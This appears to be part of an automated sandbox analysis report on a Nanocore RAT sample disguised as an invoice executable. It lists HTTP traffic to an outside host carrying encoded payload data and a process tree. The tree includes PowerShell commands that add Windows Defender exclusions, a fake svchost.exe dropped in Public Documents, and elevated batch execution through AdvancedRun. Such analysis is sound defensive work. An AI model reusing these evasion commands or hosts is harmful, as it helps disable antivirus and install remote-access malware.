Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VIly4ifI1CjuX1x7xMvuvZ4ufX4povTFDMLMZ3f38OLVTs8E%2F9TLnhlNudAQjutw%2Fry87GZyZyTnJS0oWfBBpIVNmdf4SH6OzvUUeYR%2Fb6xytam6"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6256bf55def90b63-AMS
                                                                                                                                                                Data Raw: 32 62 62 63 0d 0a 3c 70 3e 47 47 68 4d 46 68 75 74 74 68 46 68 4c 68 46 68 46 68 46 68 74 68 46 68 46 68 46 68 4b 54 54 68 4b 54 54 68 46 68 46 68 75 52 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 6a 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 46 68 46 68 75 74 68 4c 75 68 75 52 6a 68 75 74 68 46 68 75 52 46 68 4d 68 4b 46 54 68 4c 4c 68 75 52 74 68 75 68 47 6a 68 4b 46 54 68 4c 4c 68 52 74 68 75 46 74 68 75 46 54 68 75 75 54 68 4c 4b 68 75 75 4b 68 75 75 74 68 75 75 75 68 75 46 4c 68 75 75 74 68 4d 47 68 75 46 4d 68 4c 4b 68 4d 4d 68 4d 47 68 75 75 46 68 75 75 46 68 75 75 75 68 75 75 6a 68 4c 4b 68 4d 52 68 75 46 75 68 4c 4b 68 75 75 74 68 75 75 47 68 75 75 46 68 4c 4b 68 75 46 54 68 75 75 46 68 4c 4b 68 6a 52 68 47 4d 68 52 4c 68 4c 4b 68 75 46 4d 68 75 75 75 68 75 46 46 68 75 46 75 68 74 6a 68 75 4c 68 75 4c 68 75 46 68 4c 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 52 46 68 6a 4d 68 46 68 46 68 47 6a 68 75 68 4c 68 46 68 47 6a 68 75 74 4b 68 74 75 68 75 52 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 4b 4b 74 68 46 68 4c 74 68 46 68 75 75 68 75 68 52 46 68 46 68 46 68 75 46 46 68 75 46 68 46 68 46 68 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4d 46 68 75 4c 75 68 75 46 68 46 68 46 68 4c 4b 68 46 68 46 68 46 68 75 6a 46 68 75 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 4c 4b 68 46 68 46 68 46 68 4b 68 46 68 46 68 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 74 68 46 68 46 68 46
                                                                                                                                                                Data Ascii: 2bbc<p>GGhMFhutthFhLhFhFhFhthFhFhFhKTThKTThFhFhuRthFhFhFhFhFhFhFhjthFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhuKRhFhFhFhuthLuhuRjhuthFhuRFhMhKFThLLhuRthuhGjhKFThLLhRthuFthuFThuuThLKhuuKhuuthuuuhuFLhuuthMGhuFMhLKhMMhMGhuuFhuuFhuuuhuujhLKhMRhuFuhLKhuuthuuGhuuFhLKhuFThuuFhLKhjRhGMhRLhLKhuFMhuuuhuFFhuFuhtjhuLhuLhuFhLjhFhFhFhFhFhFhFhRFhjMhFhFhGjhuhLhFhGjhutKhtuhuRFhFhFhFhFhFhFhFhFhKKthFhLthFhuuhuhRFhFhFhuFFhuFhFhFhjhFhFhFhFhFhFhuMFhuLuhuFhFhFhLKhFhFhFhujFhuFhFhFhFhFhuKRhFhLKhFhFhFhKhFhFhthFhFhFhFhFhFhFhthFhFhF
Feb 22, 2021 07:46:07.745496035 CET | 6741 | OUT | GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:46:08.022222042 CET | 6742 | OUT | GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:46:08.334716082 CET | 6742 | OUT | GET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:46:11.912823915 CET | 6796 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:46:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d8a4f89e5db9fd7094b57d272278adacd1613976368; expires=Wed, 24-Mar-21 06:46:08 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:37 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a160ef500000b6356391000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ejzklZG6HnvVweS65LfVH3s82Eppf0x1bJhpn2oi820qxgiX7E1i7UCQocAriixXoOS21o0H9gVFzDkyQkD0Wo0070AkBQma%2BH71SAChAINnyN1X"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6256bf918f140b63-AMS
                                                                                                                                                                Data Raw: 33 32 35 32 0d 0a 3c 70 3e 54 74 68 75 6a 75 68 4d 47 68 75 54 46 68 47 6a 68 75 47 4b 68 75 6a 74 68 75 75 75 68 75 6a 4c 68 75 47 47 68 4d 46 68 75 47 75 68 4b 4c 4d 68 75 4b 74 68 4d 6a 68 4b 74 74 68 4b 74 75 68 47 4c 68 75 4c 74 68 54 4b 68 75 4d 46 68 4b 4c 4c 68 4b 4b 74 68 6a 75 68 4d 47 68 75 4b 52 68 75 6a 4c 68 52 4d 68 4d 75 68 4b 4b 52 68 6a 75 68 47 46 68 6a 54 68 4b 46 4b 68 74 6a 68 6a 4c 68 75 4b 6a 68 75 52 4b 68 4d 54 68 4c 68 75 75 4d 68 75 52 52 68 4b 74 68 4b 4b 46 68 4b 4b 54 68 74 74 68 54 47 68 4b 75 54 68 47 75 68 75 4b 46 68 75 46 4d 68 75 74 75 68 4c 54 68 54 6a 68 6a 54 68 4b 46 6a 68 4d 4b 68 4b 4c 4b 68 75 4d 4c 68 54 74 68 54 52 68 75 4c 68 4c 47 68 6a 6a 68 4b 4c 75 68 4b 4c 74 68 75 74 54 68 4b 75 74 68 4b 46 4d 68 75 75 46 68 4b 4c 74 68 75 4c 47 68 6a 52 68 75 74 52 68 4b 4c 54 68 75 4d 74 68 4b 4b 46 68 4d 75 68 75 52 75 68 75 74 4d 68 4b 4b 4d 68 4b 74 4d 68 75 75 74 68 75 47 68 47 54 68 54 52 68 6a 47 68 75 4d 75 68 4c 4d 68 75 75 4d 68 4c 4b 68 75 52 4c 68 4d 6a 68 75 4c 4b 68 74 4b 68 75 6a 46 68 4b 47 68 75 75 74 68 75 4b 46 68 75 6a 52 68 75 4d 4c 68 47 54 68 4b 75 54 68 75 6a 75 68 4b 75 4c 68 75 47 54 68 75 47 46 68 75 47 4c 68 47 52 68 47 4c 68 75 52 75 68 75 54 74 68 4c 54 68 4d 46 68 4b 46 52 68 4b 46 68 4b 4d 68 47 4c 68 75 52 4d 68 4d 68 75 52 54 68 75 4c 68 6a 47 68 75 47 47 68 75 74 74 68 75 75 54 68 75 47 75 68 4c 47 68 75 47 54 68 75 4b 47 68 4b 75 52 68 4b 54 74 68 75 4c 4d 68 47 68 4b 4c 68 4b 46 74 68 4b 75 6a 68 54 46 68 52 4c 68 75 74 46 68 75 54 4c 68 47 4d 68 4b 4b 68 4b 4b 54 68 75 6a 4b 68 75 47 6a 68 54 75 68 75 6a 52 68 75 4d 47 68 75 4d 75
                                                                                                                                                                Data Ascii: 3252<p>TthujuhMGhuTFhGjhuGKhujthuuuhujLhuGGhMFhuGuhKLMhuKthMjhKtthKtuhGLhuLthTKhuMFhKLLhKKthjuhMGhuKRhujLhRMhMuhKKRhjuhGFhjThKFKhtjhjLhuKjhuRKhMThLhuuMhuRRhKthKKFhKKThtthTGhKuThGuhuKFhuFMhutuhLThTjhjThKFjhMKhKLKhuMLhTthTRhuLhLGhjjhKLuhKLthutThKuthKFMhuuFhKLthuLGhjRhutRhKLThuMthKKFhMuhuRuhutMhKKMhKtMhuuthuGhGThTRhjGhuMuhLMhuuMhLKhuRLhMjhuLKhtKhujFhKGhuuthuKFhujRhuMLhGThKuThujuhKuLhuGThuGFhuGLhGRhGLhuRuhuTthLThMFhKFRhKFhKMhGLhuRMhMhuRThuLhjGhuGGhutthuuThuGuhLGhuGThuKGhKuRhKTthuLMhGhKLhKFthKujhTFhRLhutFhuTLhGMhKKhKKThujKhuGjhTuhujRhuMGhuMu
Feb 22, 2021 07:46:22.073544025 CET | 7863 | OUT | GET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1
Host: coroloboxorozor.com
Feb 22, 2021 07:46:22.150278091 CET | 7865 | IN | HTTP/1.1 200 OK
Date: Mon, 22 Feb 2021 06:46:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da6c801eeade6f7b0def4839c9a77c4b81613976382; expires=Wed, 24-Mar-21 06:46:22 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 04:01:39 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086a16429f00000b6375246000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ryBWoADTjtuhHg5oD%2BjCDj1TR6kUqYe%2BZURubDEuTPm7HmmItoa%2FWiga8j%2BTEQvtFQJG4%2Bu0yrrA7rg9KKpXP3KoK3R7B3lp3GHAKzDGY9TshZwf"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6256bfe4384d0b63-AMS


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                Behavior

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:10
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe'
                                                                                                                                                                Imagebase:0x80000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:28
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:32
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:37
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:37
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:38
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:38
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

General

Start time: 07:45:39
Start date: 22/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:45:39
Start date: 22/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase: 0xaf0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:45:39
Start date: 22/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 07:45:40
Start date: 22/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 07:45:40
Start date: 22/02/2021
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 1
Imagebase: 0x10d0000
File size: 26112 bytes
MD5 hash: 121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:45:41
Start date: 22/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:45:43
Start date: 22/02/2021
Path: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
Imagebase: 0xd50000
File size: 206848 bytes
MD5 hash: A656F522F604872E02DAEE9DBC458D9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 26%, ReversingLabs

General

Start time: 07:45:43
Start date: 22/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 07:45:47
Start date: 22/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:45:48
Start date: 22/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Imagebase: 0x910000
File size: 107624 bytes
MD5 hash: F866FC1C2E928779C7119353C3091F0C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 07:45:50
Start date: 22/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:45:49
Start date: 22/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:45:50
Start date: 22/02/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
Imagebase: 0xd90000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:45:51
Start date: 22/02/2021
Path: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
Imagebase: 0x4c0000
File size: 206848 bytes
MD5 hash: A656F522F604872E02DAEE9DBC458D9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 07:45:51
Start date: 22/02/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
Imagebase: 0xd90000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 07:46:08
Start date: 22/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:46:35
Start date: 22/02/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
Imagebase: 0x7ff64e5e0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 07:46:35
Start date: 22/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:46:41
Start date: 22/02/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 07:46:41
Start date: 22/02/2021
Path: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 3%, Metadefender
• Detection: 0%, ReversingLabs

Disassembly

Code Analysis
